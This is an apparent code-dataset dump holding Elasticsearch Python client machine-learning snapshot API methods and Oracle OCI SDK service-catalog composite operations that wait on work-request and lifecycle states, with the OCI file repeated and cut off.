def revert_model_snapshot(self, job_id, snapshot_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to revert to
:arg body: Reversion options
:arg delete_intervening_results: Should we reset the results back to the
time of the snapshot?
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_revert'), params=params, body=body)
@query_params('desc', 'end', 'from_', 'size', 'sort', 'start')
def get_model_snapshots(self, job_id, snapshot_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to fetch
:arg body: Model snapshot selection criteria
:arg desc: True if the results should be sorted in descending order
:arg end: The filter 'end' query parameter
:arg from_: Skips a number of documents
:arg size: The default number of documents returned in queries as a
string.
:arg sort: Name of the field to sort on
:arg start: The filter 'start' query parameter
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params, body=body)
@query_params()
def delete_model_snapshot(self, job_id, snapshot_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to delete
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params)
| en | 0.712137 | :arg filter_id: The ID of the filter to fetch :arg from_: skips a number of filters :arg size: specifies a max number of filters to get `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_ :arg datafeed_id: The ID of the datafeeds to fetch `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_ :arg datafeed_id: The ID of the datafeeds stats to fetch `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_ :arg job_id: ID of the job to get bucket results from :arg timestamp: The timestamp of the desired single bucket result :arg body: Bucket selection details if not provided in URI :arg anomaly_score: Filter for the most anomalous buckets :arg desc: Set the sort direction :arg end: End time filter for buckets :arg exclude_interim: Exclude interim results :arg expand: Include anomaly records :arg from_: skips a number of buckets :arg size: specifies a max number of buckets to get :arg sort: Sort buckets by a particular field :arg start: Start time filter for buckets `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_ :arg job_id: The name of the job receiving the data :arg body: The data to process :arg reset_end: Optional parameter to specify the end of the bucket resetting range :arg reset_start: Optional parameter to specify the start of the bucket resetting range `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to stop :arg force: True if the datafeed should be forcefully stopped. :arg timeout: Controls the time to wait until a datafeed has stopped. Default to 20 seconds `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_ :arg job_id: The ID of the jobs to fetch `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_ :arg job_id: The ID of the job to create :arg body: The job :arg body: The detector `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to start :arg body: The start datafeed parameters :arg end: The end time when the datafeed should stop. When not set, the datafeed continues in real time :arg start: The start time from where the datafeed should begin :arg timeout: Controls the time to wait until a datafeed has started. 
Default to 20 seconds `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_ :arg job_id: None :arg body: Record selection criteria :arg desc: Set the sort direction :arg end: End time filter for records :arg exclude_interim: Exclude interim results :arg from_: skips a number of records :arg record_score: :arg size: specifies a max number of records to get :arg sort: Sort records by a particular field :arg start: Start time filter for records `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_ :arg job_id: The ID of the job to create :arg body: The job update settings :arg filter_id: The ID of the filter to create :arg body: The filter details `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to update :arg body: The datafeed update settings `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to preview `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_ :arg job_id: The name of the job to flush :arg body: Flush parameters :arg advance_time: Advances time to the given value generating results and updating the model for the advanced interval :arg calc_interim: Calculates interim results for the most recent bucket or all buckets within the latency period :arg end: When used in conjunction with calc_interim, specifies the range of buckets on which to calculate interim results :arg skip_time: Skips time to the given value without generating results or updating the model for the skipped interval :arg start: When used in conjunction with calc_interim, specifies the range of buckets on which to calculate interim results `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_ :arg job_id: The name of the job to close :arg force: True if the job should be forcefully closed :arg timeout: Controls the time to wait until a job has closed. 
Default to 30 minutes `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_ :arg job_id: The ID of the job to open `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_ :arg job_id: The ID of the job to delete :arg force: True if the job should be forcefully deleted `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_ :arg job_id: The ID of the job to fetch :arg snapshot_id: The ID of the snapshot to update :arg body: The model snapshot properties to update :arg filter_id: The ID of the filter to delete :arg body: The job config `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_ :arg job_id: The name of the job :arg category_id: The identifier of the category definition of interest :arg body: Category selection details if not provided in URI :arg from_: skips a number of categories :arg size: specifies a max number of categories to get `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_ :arg job_id: None :arg body: Influencer selection criteria :arg desc: whether the results should be sorted in decending order :arg end: end timestamp for the requested influencers :arg exclude_interim: Exclude interim results :arg from_: skips a number of influencers :arg influencer_score: influencer score threshold for the requested influencers :arg size: specifies a max number of influencers to get :arg sort: sort field for the requested influencers :arg start: start timestamp for the requested influencers `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to create :arg body: The datafeed config `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_ :arg datafeed_id: The ID of the datafeed to delete :arg force: True if the datafeed should be forcefully deleted `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_ :arg job_id: The ID of the jobs stats to fetch `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_ :arg job_id: The ID of the job to fetch :arg snapshot_id: The ID of the snapshot to revert to :arg body: Reversion options :arg delete_intervening_results: Should we reset the results back to the time of the snapshot? `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_ :arg job_id: The ID of the job to fetch :arg snapshot_id: The ID of the snapshot to fetch :arg body: Model snapshot selection criteria :arg desc: True if the results should be sorted in descending order :arg end: The filter 'end' query parameter :arg from_: Skips a number of documents :arg size: The default number of documents returned in queries as a string. :arg sort: Name of the field to sort on :arg start: The filter 'start' query parameter `<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_ :arg job_id: The ID of the job to fetch :arg snapshot_id: The ID of the snapshot to delete | 2.366878 | 2 |
src/oci/service_catalog/service_catalog_client_composite_operations.py | LaudateCorpus1/oci-python-sdk | 0 | 9131 | <filename>src/oci/service_catalog/service_catalog_client_composite_operations.py
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class ServiceCatalogClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.service_catalog.ServiceCatalogClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new ServiceCatalogClientCompositeOperations object
:param ServiceCatalogClient client:
The service client which will be wrapped by this object
"""
self.client = client
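    # Minimal construction sketch (not part of the generated SDK source): the
    # wrapper is normally built around an existing ServiceCatalogClient, e.g.
    #
    #     import oci
    #     config = oci.config.from_file()
    #     client = oci.service_catalog.ServiceCatalogClient(config)
    #     composite = oci.service_catalog.ServiceCatalogClientCompositeOperations(client)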
def change_private_application_compartment_and_wait_for_state(self, private_application_id, change_private_application_compartment_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required)
The details of the request to change the compartment of a given private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_private_application_compartment(private_application_id, change_private_application_compartment_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
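    # Usage sketch (OCIDs are placeholders): moving a private application and
    # blocking until the underlying work request finishes could look like this,
    # assuming SUCCEEDED is an acceptable terminal WorkRequest status.
    #
    #     details = oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails(
    #         compartment_id="ocid1.compartment.oc1..example")
    #     composite.change_private_application_compartment_and_wait_for_state(
    #         "ocid1.privateapplication.oc1..example", details,
    #         wait_for_states=["SUCCEEDED"])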
def create_private_application_and_wait_for_state(self, create_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required)
Private application creation details.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_private_application(create_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_service_catalog_and_wait_for_state(self, create_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required)
The details for creating a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_service_catalog(create_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
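    # Hedged example (field values are placeholders): creating a catalog and
    # waiting for it to become ACTIVE, assuming ACTIVE is a valid ServiceCatalog
    # lifecycle state in the target SDK version.
    #
    #     details = oci.service_catalog.models.CreateServiceCatalogDetails(
    #         compartment_id="ocid1.compartment.oc1..example",
    #         display_name="team-catalog")
    #     catalog = composite.create_service_catalog_and_wait_for_state(
    #         details, wait_for_states=["ACTIVE"])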
def delete_private_application_and_wait_for_state(self, private_application_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = None
try:
operation_result = self.client.delete_private_application(private_application_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_service_catalog_and_wait_for_state(self, service_catalog_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_service_catalog(service_catalog_id)
operation_result = None
try:
operation_result = self.client.delete_service_catalog(service_catalog_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
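    # Sketch (identifier is a placeholder): deletion waits on the resource
    # itself, so waiting for DELETED (with the succeed_on_not_found behaviour
    # above) could be expressed as:
    #
    #     composite.delete_service_catalog_and_wait_for_state(
    #         "ocid1.servicecatalog.oc1..example", wait_for_states=["DELETED"])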
def update_private_application_and_wait_for_state(self, private_application_id, update_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required)
The details for updating the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_private_application(private_application_id, update_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_service_catalog_and_wait_for_state(self, service_catalog_id, update_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required)
Details to update for a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_service_catalog(service_catalog_id, update_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| <filename>src/oci/service_catalog/service_catalog_client_composite_operations.py
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class ServiceCatalogClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.service_catalog.ServiceCatalogClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new ServiceCatalogClientCompositeOperations object
:param ServiceCatalogClient client:
The service client which will be wrapped by this object
"""
self.client = client
def change_private_application_compartment_and_wait_for_state(self, private_application_id, change_private_application_compartment_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required)
The details of the request to change the compartment of a given private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_private_application_compartment(private_application_id, change_private_application_compartment_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_private_application_and_wait_for_state(self, create_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required)
Private application creation details.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_private_application(create_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_service_catalog_and_wait_for_state(self, create_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required)
The details for creating a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_service_catalog(create_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_private_application_and_wait_for_state(self, private_application_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = None
try:
operation_result = self.client.delete_private_application(private_application_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_service_catalog_and_wait_for_state(self, service_catalog_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog`
:param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_service_catalog(service_catalog_id)
operation_result = None
try:
operation_result = self.client.delete_service_catalog(service_catalog_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_private_application_and_wait_for_state(self, private_application_id, update_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required)
The details for updating the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application`
:param dict waiter_kwargs:
